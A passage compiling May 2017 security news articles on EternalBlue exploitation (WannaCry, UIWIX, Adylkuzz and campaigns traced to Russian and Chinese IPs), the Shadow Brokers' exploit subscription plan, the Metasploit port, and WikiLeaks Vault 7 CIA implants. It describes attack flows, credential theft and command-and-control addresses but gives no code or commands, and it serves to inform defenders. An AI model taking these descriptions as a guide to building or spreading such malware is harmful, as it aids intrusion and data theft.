The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of users and terminate and/or delete various files or processes and a memory dump reveals that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from the server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

The researchers describe a “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since mid-April.” “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed,” they say.

As part of this attack, the researchers say, actors were using an EternalBlue-based worm to infect all machines in a compromised network, and were also deploying a backdoor for persistence or exfiltrating login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application, and used it to download multiple modules, including SQLite DLL from SourceForge to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known root-kit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, the United States Computer Emergency Readiness Team (US-CERT) issued an alert after the Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows SMBv3 zero-day vulnerability (CVE-2017-0016) was assessed with a High severity rating after initially being believed to be Critical.


More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry
20.5.2017 thehackernews BigBrothers

Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools allegedly belonging to the NSA's elite hacking team, the Equation Group, several hacking groups and individual hackers have started using them in their own ways.
The April data dump was believed to be the most damaging release by the Shadow Brokers to date, as it publicly leaked many Windows hacking tools, including a dangerous Windows SMB exploit.
After the outbreak of WannaCry last week, security researchers identified multiple campaigns exploiting the Windows SMB vulnerability (CVE-2017-0143), called Eternalblue, which has already compromised hundreds of thousands of computers worldwide.
It has even been confirmed to me by multiple sources in the hacking and intelligence community that many groups and individuals are actively exploiting Eternalblue for different motives.
Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily.
Cybersecurity startup Secdo, an incident response platform, recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of the WannaCry global ransomware attacks.
So it would not be surprising to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals.

The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors and botnet malware and to exfiltrate user credentials.
According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, "a backdoor may persist and compromised credentials may be used to regain access" to the affected systems.
Both campaigns use a similar attack flow: attackers initially infect the target machine with malware via different attack vectors, then use Eternalblue to infect other devices in the same network, and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials.
Russian Campaign: Credential-Theft Attacks

Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue.
Once infected, the thread begins downloading multiple malicious modules and then uses a SQLite DLL to retrieve users' saved login credentials from Mozilla's Firefox browser.
The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server.
Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system.
According to Secdo, "at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack."
This attack has been traced back to late April, three weeks prior to the WannaCry outbreak. The attack originates from a Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian.
Chinese Campaign: Installs Rootkit and DDoS Botnet

This campaign was also seen in late April.
Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack.
But instead of remaining purely in memory, the initial payload then connects back to a Chinese command-and-control server (117.21.191.69) on port 998 and downloads a known rootkit backdoor, based on the ‘Agony rootkit’, to achieve persistence.
Once installed, the payload installs Chinese botnet malware, equipped with DDoS attack functionality, on the affected machine.
"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch," Secdo concluded.
"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible."
These malicious campaigns went unnoticed for weeks because, unlike WannaCry, their purpose was different: holding affected systems for a long time by achieving persistence and stealing credentials to regain access.
A recent example is "Adylkuzz," a recently discovered stealthy cryptocurrency-mining malware that was also using the Windows SMB vulnerability at least two weeks before the outbreak of the WannaCry ransomware attacks.
These attacks are just the beginning, as attacks like WannaCry have not been completely stopped, and given the broad impact of the NSA exploits, hackers and cyber criminals are waiting for the next Shadow Brokers release, which has promised to leak more zero-days and exploits starting next month.
Since the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks.
You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.


UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread
20.5.2017 securityaffairs BigBrothers
Security experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution
The effects of the militarization of cyberspace are dangerous and unpredictable. Malicious code developed by a government can create serious problems for Internet users, as the recent massive WannaCry attack, which used the EternalBlue exploit to spread, demonstrates.

Now a new ransomware, dubbed UIWIX, was discovered to be using the NSA-linked EternalBlue exploit for distribution.

UIWIX is a fileless malware discovered by experts at Heimdal Security early this week while investigating WannaCry.

Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but the new threat runs in the memory of the infected system after EternalBlue exploitation.

“As we feared in yesterday’s alert, another ransomware variant, known as Uiwix, has been spotted in the wild, exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used. Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.” reads the analysis published by Heimdal Security.

Malware researchers at Trend Micro also investigated UIWIX and confirmed that it is a stealthier threat that is hard to analyze: it doesn’t write files to the infected machine, and it is also able to detect the presence of a virtual machine (VM) or sandbox.

“So how is UIWIX different? It appears to be fileless: UIWIX is executed in memory after exploiting EternalBlue. Fileless infections don’t entail writing actual files/components to the computer’s disks, which greatly reduces its footprint and in turn makes detection trickier.” wrote Trend Micro.

“UIWIX is also stealthier, opting to terminate itself if it detects the presence of a virtual machine (VM) or sandbox. Based on UIWIX’s code strings, it appears to have routines capable of gathering the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.”

UIWIX is able to steal browser login, File Transfer Protocol (FTP), email, and messenger credentials from the infected system.

Unlike WannaCry, UIWIX leverages a Dynamic-link Library (DLL) to gain persistence.

Below is a summary of WannaCry’s and UIWIX’s notable features, as reported by Trend Micro:

| Feature | WannaCry | UIWIX |
| --- | --- | --- |
| Attack vectors | SMB vulnerabilities (MS17-010), TCP port 445 | SMB vulnerabilities (MS17-010), TCP port 445 |
| File type | Executable (EXE) | Dynamic-link Library (DLL) |
| Appended extension | {original filename}.WNCRY | ._{unique id}.UIWIX |
| Autostart and persistence mechanisms | Registry | None |
| Anti-VM, VM check, or anti-sandbox routines | None | Checks presence of VM and sandbox-related files or folders |
| Network activity | On the internet, scans for random IP addresses to check if it has an open port 445; connects to .onion site using Tor browser | Uses mini-tor.dll to connect to .onion site |
| Exceptions (doesn’t execute if it detects certain system components) | None | Terminates itself if found running in Russia, Kazakhstan, and Belarus |
| Exclusions (directories or file types it doesn’t encrypt) | Avoids encrypting files in certain directories | Avoids encrypting files in two directories, and files with certain strings in their file name |
| Network scanning and propagation | Yes (worm-like propagation) | No |
| Kill switch | Yes | No |
| Number of targeted file types | 176 | All files in the affected system except those in its exclusion list |
| Shadow copies deletion | Yes | No |
| Languages supported (ransom notes, payment site) | Multilingual (27) | English only |

Another interesting behavior observed by the researchers is that the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, and Belarus.

The malware’s network activity relies on mini-tor.dll to connect to a .onion site, whereas WannaCry scanned the Internet for random IP addresses to check for an open port 445 and connected to a .onion site using the Tor browser.

Most evident differences between WannaCry and UIWIX are:

UIWIX doesn’t implement the worm spreading capabilities;
UIWIX doesn’t include a kill-switch;
UIWIX uses a different Bitcoin address for each victim;

Clearly, the WannaCry attack represents a great opportunity for the cyber crime ecosystem: every time a new flaw is discovered, crooks try to exploit it in attacks in the wild, for example by including the exploit code in crimeware kits used in hacking campaigns.

Recently we reported the case of the Adylkuzz botnet, another malware that leveraged the EternalBlue exploit to spread a Monero miner.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to. Apart from WannaCry and UIWIX, our sensors also detected a Trojan delivered using EternalBlue—Adylkuzz (TROJ_COINMINER.WN). This malware turns infected systems into zombies and steals its resources in order to mine for the cryptocurrency Monero.” Trend Micro concludes.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching.”


WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions
20.5.2017 securityaffairs BigBrothers

Wikileaks released the documentation for the Athena Spyware, a malware that could infect and remote control almost any Windows machine.
Last Friday, Wikileaks released the documentation for the AfterMidnight and Assassin malware platforms; today the organization leaked a new batch of the CIA Vault 7 dump that includes the documentation related to a spyware framework dubbed Athena/Hera.

The batch of CIA files includes a user manual of the Athena platform, an overview of the technology, and a demo on how to use the malware.

Reading the documents, it emerges that almost any Windows system could be infected by the two spyware tools: Athena works on XP through Windows 10, and Hera on Windows 8 through Windows 10.

The Athena / Hera malware was used by the CIA to take remote control of infected Windows machines.
“The Athena System fulfills COG/NOD’s need for a remote beacon/loader. Table 2 shows the system components available in Athena/Hera v1.0. The target computer operating systems are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32- bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10.” reads the system overview included in the user guide. “Ubuntu v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening Post.”

The Athena spyware was written in Python and seems to date back to August 2015; if confirmed, this is worrying news because Microsoft released Windows 10 in July 2015.

Athena is the result of a joint work of CIA developers and peers at cyber security firm Siege Technologies that is specialized in offensive cyber security.

“Athena is a beacon loader developed with Siege Technologies. At the core it is a very simple implant application. It runs in user space and beacons from the srvhost process. The following diagram shows the concept of operation.” states the Athena Technology Overview.


The documents leaked by Wikileaks reveal the ability of the Athena spyware to modify its configuration in real time, customizing it to a specific operation.

“Once installed, the malware provides a beaconing capability (including configuration and task handling), the memory loading/unloading of malicious payloads for specific tasks and the delivery and retrieval of files to/from a specified directory on the target system,” WikiLeaks claims.

However, WikiLeaks has not provided any detail about the operations being conducted by the agency using Athena, but it is not hard to imagine how the intelligence agency would be using this program to spy on their targets.

Below is the list of the main dumps leaked by WikiLeaks:

The Year Zero that revealed CIA hacking exploits for hardware and software.
Weeping Angel spying tool to hack Samsung smart TV and use them as
The Dark Matter dump is containing iPhone and Mac hacking exploits.
The Marble batch focused on a framework used by the CIA to make hard the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.
The Scribbles Project for document tracking.
Archimedes man-in-the-middle (MitM) attack tool.
AfterMidnight and Assassin malware platforms.


Shadow Brokers Promise More Exploits for Monthly Fee

18.5.2017 securityweek BigBrothers
The hacker group calling itself Shadow Brokers claims to possess even more exploits stolen from the NSA-linked Equation Group, and anyone can have them by paying a monthly “membership” fee.

The Shadow Brokers have been in the news over the past days after unknown threat actors leveraged two of the exploits they leaked to deliver WannaCry ransomware to hundreds of thousands of systems worldwide.

The attackers have used an exploit called EternalBlue, which leverages an SMB vulnerability in Windows, to distribute the ransomware without user interaction. Microsoft patched the flaw in March and over the weekend it made available fixes even for outdated versions of Windows.

Some people blamed Shadow Brokers for the devastating WannaCry attacks, arguing that the ransomware could not have spread so easily without the exploits they leaked. Others believe the existence of the vulnerability would have come to light at some point even without them leaking the exploit.

The Shadow Brokers insist that their main goal is to make money and to demonstrate that they are a “worthy opponent” of the Equation Group.

The hackers claimed Microsoft postponed its February security updates to address the EternalBlue and other Eternal exploits. However, they pointed out that they had waited for 30 days after Microsoft rolled out the fixes before releasing the exploits.

The WannaCry attacks led to Microsoft president and chief legal officer Brad Smith renewing his call for governments to stop stockpiling vulnerabilities and disclose them to affected vendors.

Shadow Brokers, however, claims the NSA and Microsoft are “BFFs,” with contracts of “millions or billions of USD each year.” Their other conspiracy theories include an agreement between the NSA and Microsoft over not patching vulnerabilities until they are publicly disclosed, and Microsoft fixing the recent SMB flaw in secret after the NSA lied about the exploits it had been using.

Shadow Brokers claims to possess much more data and exploits, and in June the group plans on launching a subscription-based “service.”

According to the hackers, people willing to pay a monthly fee will receive exploits for browsers, routers, mobile devices, and Windows (including Windows 10). The offer also includes SWIFT network data and information on Russian, Chinese, Iranian and North Korean nuclear and missile programs.

Judging by the group’s previous offers to sell the data for thousands and even tens of thousands of bitcoins, the membership fee will likely not be small.

However, if someone offers to buy the remaining exploits and data from the Shadow Brokers, the group said it will go dark permanently as it will no longer have any financial incentive to continue taking risks.

In January, after failed attempts to make money via auctions, crowdfunding and direct sales, Shadow Brokers announced that it was retiring. With the renewed interest in the exploits it possesses, the group has apparently come up with yet another strategy for making a profit.


Shadow Brokers are back after WannaCry case, it plans to offer data dump on monthly subscription model
17.5.2017 securityaffairs BigBrothers

Shadow Brokers made the headlines once again, the notorious group plans to offer data dump on a monthly subscription model.
The notorious Shadow Brokers hacking group made the headlines during the weekend when systems worldwide were compromised by the WannaCry ransomware, because the threat leveraged the EternalBlue exploit and the DoublePulsar backdoor developed by the NSA.

Both tools were included in the huge trove of documents and exploits dumped by the Shadow Brokers last month after a failed attempt to auction them off.

The vulnerability exploited by the tools was fixed by Microsoft in March, and the company took the unusual decision of releasing patches for unsupported versions of its operating systems, including Windows XP and Windows Server 2003.

Shadow Brokers went public with a long message to netizens in which the group criticized the US government and IT giants for the way they managed the exploits in the months before their public release.


It references its posting of screenshots of Windows exploits from its haul, a development it credits for Microsoft’s release of an SMB (Server Message Block) patch in March, before attempting to justify its release of tools a month later in April, warning there was a lot more where that came from.

“In April, 90 days from theequationgroup show and tell, 30 days from Microsoft patch, theshadowbrokers dumps old Linux (auction file) and windows ops disks. Because why not? TheShadowBrokers is having many more where coming from? “75% of U.S. cyber arsenal”.TheShadowBrokers dumped 2013 OddJob from ROCTOOLS and 2013 JEEPFLEAMARKET from /TARGETS. This is theshadowbrokers way of telling theequationgroup “all your bases are belong to us”. TheShadowBrokers is not being interested in stealing grandmothers’ retirement money. This is always being about theshadowbrokers vs theequationgroup.” states the Shadow Brokers’ message.

According to the Shadow Brokers, the NSA-linked EquationGroup has clearly infiltrated tech giants, including Microsoft. The hacking group says it plans to sell off new exploits every month from June onwards. Windows 10, web browser and router exploits along with “compromised network data from more SWIFT providers and Central banks” are among the items that might be offered through the “dump of the month” service.

The hacking crew announced that it plans to sell new exploits every month starting in June, a data dump offered on a monthly subscription model.

The group claims to have exploit codes for almost any technology available on the market, including “compromised network data from more SWIFT providers and Central banks.”

TheShadowBrokers Monthly Data Dump could be being:

web browser, router, handset exploits and tools
select items from newer Ops Disks, including newer exploits for Windows 10
compromised network data from more SWIFT providers and Central banks
compromised network data from Russian, Chinese, Iranian, or North Korean nukes and missile programs
“In June, TheShadowBrokers is announcing “TheShadowBrokers Data Dump of the Month” service. TheShadowBrokers is launching new monthly subscription model. Is being like wine of month club. Each month peoples can be paying membership fee, then getting members only data dump each month. What members doing with data after is up to members.” continues the group’s message.

Experts believe the Shadow Brokers team would shut down operations permanently; the group says it is looking for a “responsible party is buying all lost data before it is being sold.”


World Close to 'Serious Digital Sabotage': Dutch Spy Chief

17.5.2017 securityweek BigBrothers
The world may be close to a "serious act of digital sabotage" which could trigger unrest, "chaos and disorder," Dutch spy chief Rob Bertholee warned Tuesday.

Sabotage of critical infrastructure "is the kind of thing that might keep you awake at night," Bertholee told a timely cyber security conference in The Hague, as global experts grapple with the fallout of a massive cyberattack over the past days.

Digital threats "are not imaginary, they are everywhere around us," the head of the country's intelligence services (AIVD) told the conference organised by the Dutch government.

"In my opinion, we might be closer to a serious act of digital sabotage than a lot of people can imagine," he told hundreds of experts and officials.

Bertholee highlighted how in 2012 the computers at Saudi Arabia's largest oil company came under brief attack, or how three years later Ukrainian electricity companies were hacked causing a massive blackout lasting several hours.

The world's infrastructure was heavily interconnected, which had huge benefits, but also "vulnerabilities".

"Imagine what would happen if the entire banking system were sabotaged for a day, two days, for a week," he asked.

"Or if there was a breakdown in our transportation network. Or if air traffic controllers faced cyberattacks while directing flights. The consequences could be catastrophic."

Added Bertholee: "Sabotage on one of these sectors could have major public repercussions, causing unrest, chaos and disorder."

The threat of "cyber terrorism" from terror groups such as the so-called Islamic State jihadist group and Al-Qaeda was still limited, he said, but "jihadist-inspired terrorism is the number one priority" of the Dutch intelligence services.

"The level of technical expertise available to a jihadist group is still insufficient to inflict significant damage or personal injury through digital sabotage," Bertholee said.

"They may not yet have the capability but they definitely have the intent," he warned.

Countries must be prepared for future threats in the digital domain, with governments and private sector working closely together, as this is "where our societies have become most vulnerable," he said.

Security researchers investigating the massive cyberattack campaign over past days on Tuesday reported signs that it might be slowing, and suggested a possible North Korean link.

In the first clues of the origin of the massive ransomware attacks, Google researcher Neel Mehta posted computer code that showed similarities between the "WannaCry" malware and a vast hacking effort widely attributed to Pyongyang.

Europol meanwhile said the number of affected IP addresses around the world was 163,745, a 38 percent fall from the 226,000 reported on Sunday.



NSA's EternalBlue Exploit Fully Ported to Metasploit

17.5.2017 securityweek BigBrothers
The National Security Agency (NSA)-linked EternalBlue exploit, which became well known after being used in a recent global ransomware campaign, has been ported to the popular Metasploit penetration testing framework.

Along with DoublePulsar, EternalBlue is one of the latest exploits publicly released by the hackers calling themselves “The Shadow Brokers” and is said to have been used by the NSA-linked Equation Group to launch cyber-attacks. When EternalBlue was made public, however, the flaw had already been addressed by Microsoft in its March security patches.

Abusing a vulnerability in Windows’ Server Message Block (SMB) on port 445, EternalBlue allowed the WannaCry ransomware to spread like a worm and hit over 200,000 machines within a few days only. Before WannaCry, however, a crypto-currency mining botnet dubbed Adylkuzz had been using the same exploit to compromise devices.

Researchers currently estimate that roughly one million Internet-accessible systems are vulnerable to EternalBlue, but chances are that many more existed only a couple of days ago. Not only did Microsoft issue an emergency patch to protect older systems over the weekend, but the Adylkuzz botnet also blocks access to SMB after infection, to prevent other malware from exploiting the vulnerability.

Because malicious actors are already using EternalBlue in live attacks, researchers decided to add the exploit to the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The framework is a sub-project of the penetration testing project Metasploit, which is a collaboration of the open source community and Rapid7.

The vulnerability exploited by EternalBlue is in SMBv1, but the exploit uses SMBv2 for the shellcode, one of the researchers behind the port, who goes by the online handle of zerosum0x0, explains. The penetration tester also notes that the code is still a little rough, but that more work will be done to it.

“The genie is already out of the bottle with EternalBlue. Let's keep in mind it's probably easier to rebundle the EternalBlue.exe than it is to pull in Ruby and Metasploit. Also, the original exploit still targets more versions. Just patch your systems people, it really isn't that hard. White hats need this exploit (instead of sketchy NSA malware) to show its impact to clients,” the researcher says.

The researcher also notes that FuzzBunch (the NSA’s exploitation framework, similar to Metasploit) makes the attack point and click, and that cybercriminals already have worms abusing it. The addition of EternalBlue to Metasploit should prove of great help to the infosec community, zerosum0x0 explains.

“I look at it this way, attackers and defenders are in an asymmetric war. If study is not done to the tools that are available to attackers, it is impossible to defend against them,” the researcher says.

Catalin Cosoi, Chief Security Strategist at Bitdefender, already expressed fears that EternalBlue-powered ransomware is bound to become the norm. Because many organizations failed to patch their systems in a timely manner, “it was only a matter of time until a cybercriminal group would weaponize the leaked vulnerability and strike at unpatched Windows systems,” he said.

“Computers in public institutions, hospitals and other care facilities are usually rarely updated. If they are not hit by ransomware now, these computers are vulnerable for state sponsored attacks for as long as they remain unpatched. Ransomware is the best case scenario now, because it’s visible. But complex threats can be built on it, to stay persistent and infiltrate organizations for a very long time,” Cosoi added.

One major difference between the Metasploit port of EternalBlue and the recent WannaCry and Adylkuzz attacks is the use of DoublePulsar. Instead of the NSA backdoor, the open source project stages Meterpreter userland payloads directly from the kernel through a queued APC. A shellcode that uses a similar technique as DoublePulsar's DLL injection is used, but is much smaller in size (up to 1000 bytes, depending on options enabled, compared to the 5000 bytes the NSA code has).

“This exploit also demonstrates what is important in the exploit for IDS/IPS/firewall rule makers. By finding out everything that can be nulled out, it evades many rules which were not fully considered, however those vendors can now add proper rules before an "0-day" worm version of it comes out,” zerosum0x0 points out.


Shadow Brokers, Who Leaked WannaCry SMB Exploit, Are Back With More 0-Days
16.5.2017 thehackernews BigBrothers
The infamous hacking collective Shadow Brokers – the group that publicly leaked the Windows SMB exploit that led to last weekend's WannaCrypt menace – is back, this time to cause more damage.
In typically broken English, the Shadow Brokers published a fresh statement (full of frustration) a few hours ago, promising to release more zero-day bugs and exploits for various desktop and mobile platforms starting from June 2017.
However, this time the Shadow Brokers leaks will not be available for everybody, as the hacking collective said:
"TheShadowBrokers is launching new monthly subscription model. Is being like [the] wine of month club. Each month peoples can be paying membership fee, then getting members only data dump each month."
Get Ready for the 'Wine of Month Club'
So, anyone buying the membership of the "wine of month club" would be able to get exclusive access to the upcoming leaks, which the Shadow Brokers claims would include:
Exploits for web browsers, routers, and smartphones.
Exploits for operating systems, including Windows 10.
Compromised data from banks and Swift providers.
Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.
The claims made by the group remain unverified at the time of writing, but since the Shadow Brokers' previously released data dump turned out to be legitimate, the group's statement should be taken seriously, at least now, when we know the EternalBlue exploit and DoublePulsar backdoor developed by the NSA and released by the Shadow Brokers last month was used by WannaCry to cause chaos worldwide.
Before publicly dumping these exploits in April, the Shadow Brokers put the cyber weapons stolen from the NSA’s elite hacking team, known as Equation Group, up for auction for 1 Million Bitcoin.
After the failed auction, the hacking group even put those hacking tools and exploits up for direct sale on an underground site, categorizing them by type (such as "exploits," "Trojans," and "implants"), each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
After failing on all fronts, the group started leaking those exploits. Last month, the Shadow Brokers released a Microsoft Windows SMB exploit that was used by the WannaCry ransomware, which infected 200,000 machines in 150 countries within just 48 hours.
Addressing the reported ties between WannaCry and the North Korean state-sponsored hacking group Lazarus Group, the group said:
"The Oracle is telling theshadowbrokers North Korea is being responsible for the global cyber attack Wanna Cry. Nukes and cyber attacks, America has to go to war, no other choices!"
Shadow Brokers Lash Out at US Government and Tech Companies
In its recent post, the Shadow Brokers criticized both the US government and tech companies, such as Microsoft, for not cracking down on the exploits when they had the chance, months before their release.
The hacking group said the US government is paying tech companies not to patch zero-days in their products, claiming that it has spies inside Microsoft among other US tech firms.
The Shadow Brokers even accused Google's Project Zero team, saying:
"TheShadowBrokers is thinking Google Project Zero is having some former TheEquationGroup member. Project Zero recently releasing "Wormable Zero-Day" Microsoft patching in record time, knowing it was coming? Coincidence?"
Who knows whether these accusations made by the Shadow Brokers group are true or not, but the world should be well prepared for another massively destructive WannaCry-like attack.


WikiLeaks Details More Windows Attack Tools Used by CIA

15.5.2017 securityweek BigBrothers
WikiLeaks has published another round of documents describing tools allegedly used by the U.S. Central Intelligence Agency (CIA). The latest dump in the “Vault 7” series details two Windows frameworks named “AfterMidnight” and “Assassin.”

AfterMidnight is described as a DLL that self-persists as a Windows service and provides secure execution for “Gremlins,” hidden payloads that allow attackers to subvert the functionality of targeted software, exfiltrate data, and provide internal services for other Gremlins.

The tool’s developers also provide a payload called “AlphaGremlin,” which can be used to schedule the execution of custom tasks on a compromised machine.

Assassin is a similar implant that allows attackers to execute various tasks on a hacked machine, such as downloading and running an executable, collecting task results, and deleting the executable. Both tools receive instructions from command and control (C&C) servers.

WikiLeaks has regularly published Vault 7 files since March 7, including documents describing tools that can be used for man-in-the-middle (MitM) attacks on the LAN, Samsung smart TV hacking tools, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

However, the organization has not published any actual exploits in an effort to prevent abuse. The recent WannaCry ransomware attacks, which rely on exploits allegedly developed by the NSA and leaked by the Shadow Brokers, have demonstrated that leaking exploits developed by intelligence agencies could have serious consequences.

WikiLeaks has offered to share exploit code with affected tech companies, but it appears they are not too keen to work with the whistleblower organization. On the other hand, based on the available information, many have determined that the vulnerabilities described in the Vault 7 files have already been patched in the latest versions of their products.

Cisco did find a critical vulnerability affecting hundreds of its switches in the Vault 7 leak. The company informed customers of the flaw back in March, but it only recently started releasing patches.

The tools leaked by Shadow Brokers have been linked to the Equation Group, which is believed to be run by the NSA. In the case of the Vault 7 files, researchers have tied them to a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


WikiLeaks Reveals 'AfterMidnight' & 'Assassin' CIA Windows Malware Frameworks
15.5.2017 thehackernews BigBrothers

When the world was dealing with the threat of the self-spreading WannaCry ransomware, WikiLeaks released a new batch of CIA Vault 7 leaks, detailing two apparent CIA malware frameworks for the Microsoft Windows platform.
Dubbed "AfterMidnight" and "Assassin," both malware programs are designed to monitor and report back actions on the infected remote host computer running the Windows operating system and execute malicious actions specified by the CIA.
Since March, WikiLeaks has published hundreds of thousands of documents and secret hacking tools that the group claims came from the US Central Intelligence Agency (CIA).
This latest batch is the 8th release in the whistleblowing organization's 'Vault 7' series.
'AfterMidnight' Malware Framework
According to a statement from WikiLeaks, 'AfterMidnight' allows its operators to dynamically load and execute malicious payload on a target system.
The main controller of the malicious payload is disguised as a self-persisting Windows Dynamic-Link Library (DLL) file and executes "Gremlins" – small payloads that remain hidden on the target machine by subverting the functionality of targeted software, surveying the target, or providing services for other gremlins.
Once installed on a target machine, AfterMidnight uses an HTTPS-based Listening Post (LP) system called "Octopus" to check for any scheduled events. If one is found, the malware framework downloads and stores all required components before loading all new gremlins into memory.

According to a user guide provided in the latest leak, local storage related to AfterMidnight is encrypted with a key which is not stored on the target machine.
A special payload, called "AlphaGremlin," contains a custom script language which even allows operators to schedule custom tasks to be executed on the targeted system.
'Assassin' Malware Framework
Assassin is similar to AfterMidnight and is described as "an automated implant that provides a simple collection platform on remote computers running the Microsoft Windows operating system."
Once installed on the target computer, this tool runs the implant within a Windows service process, allowing the operators to perform malicious tasks on an infected machine, just like AfterMidnight.
Assassin consists of four subsystems: Implant, Builder, Command and Control, and Listening Post.
The 'Implant' provides the core logic and functionality of this tool on a target Windows machine, including communications and task execution. It is configured using the 'Builder' and deployed to a target computer via some undefined vector.
The 'Builder' configures Implant and 'Deployment Executables' before deployment and "provides a custom command line interface for setting the Implant configuration before generating the Implant," reads the tool's user guide.
The 'Command and Control' subsystem acts as an interface between the operator and the Listening Post (LP), while the LP allows the Assassin Implant to communicate with the command and control subsystem through a web server.
Last week, WikiLeaks dumped a man-in-the-middle (MitM) attack tool, called Archimedes, allegedly created by the CIA to target computers inside a Local Area Network (LAN).
This practice by the US intelligence agencies of holding on to vulnerabilities, rather than disclosing them to the affected vendors, wreaked havoc across the world in the past 3 days, when the WannaCry ransomware hit computers in 150 countries by using an SMB flaw that the NSA discovered and held, and that "The Shadow Brokers" subsequently leaked over a month ago.
Microsoft Slams NSA For Its Role in 'WannaCry' Attack
Even Microsoft President Brad Smith condemned the US intelligence agency’s practice, saying that the "widespread damage" caused by WannaCry was the result of the NSA, CIA and other intelligence agencies holding on to zero-day security vulnerabilities.
"This is an emerging pattern in 2017. We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world," Smith said.
Since March, the whistleblowing group has published 8 batches in the "Vault 7" series, including the latest and last week's leaks, along with the following batches:
Year Zero – dumped CIA hacking exploits for popular hardware and software.
Weeping Angel – spying tool used by the agency to infiltrate smart TVs, transforming them into covert microphones.
Dark Matter – focused on hacking exploits the agency designed to target iPhones and Macs.
Marble – revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
Grasshopper – revealed a framework which allowed the agency to easily create custom malware for breaking into Microsoft's Windows and bypassing antivirus protection.
Scribbles – a piece of software allegedly designed to embed 'web beacons' into confidential documents, allowing the spying agency to track insiders and whistleblowers.


Mobile Ecosystem Vulnerable Despite Security Improvements: DHS

13.5.2017 securityweek  BigBrothers
Mobile security is improving, but unprotected communication paths leave the ecosystem vulnerable, according to a recent report from the Department of Homeland Security (DHS) and the National Institute of Standards and Technology (NIST).

